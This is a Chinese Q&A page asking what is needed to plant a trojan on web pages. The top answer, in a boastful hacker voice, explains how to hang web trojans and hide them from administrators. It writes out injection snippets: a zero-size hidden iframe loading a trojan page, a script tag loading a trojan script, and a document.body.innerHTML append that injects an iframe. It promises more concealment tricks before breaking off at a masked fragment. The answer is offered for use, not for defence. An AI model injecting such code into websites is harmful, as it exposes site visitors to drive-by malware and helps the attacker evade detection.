将木马挂杂网页上需要些什么软件

好评回答
      话说某夜,月黑风高。一个黑得不能再黑的黑客,在X网站上挂上了自己苦心免杀的Y网马一只。小马刚刚挂上不久就被无情地咔嚓了!我们英明神勇的Z管理员再一次揪出了藏了又藏的小马……   废话不多说,今天就给大家介绍怎么挂马。也许你会惊讶。挂马,网上不是有流传的方法吗?iframe和Script都能搞得定,怎么还有人来显 摆呢?听我说,凡是挂马,最终都是能被发现的(废话!),但是如果能最大限度地躲过检查,那岂不是更妙?因为挂马也是一种艺术。
         下面我就给大家介绍几个挂马的绝招,关键是隐藏。首先我们来了解一下常见的几种网页挂马方式,已经会的就直接跳过吧! 1)<iframe src=”muma。htm” width=0 height=0></iframe> 2)<script src=muma。
      js language=javascript></script> 3)top。document。body。innerHTML = top。document。body。innerHTML + '\r\n<iframe src="muma。
      htm "></iframe>'    以上是网上常见的挂马方式。挂马,讲的就是隐蔽,不让对方发现;而且就算发现被挂马,也不能轻易地暴露网马的地址。怎么办呢?我们有绝招!。

    轻***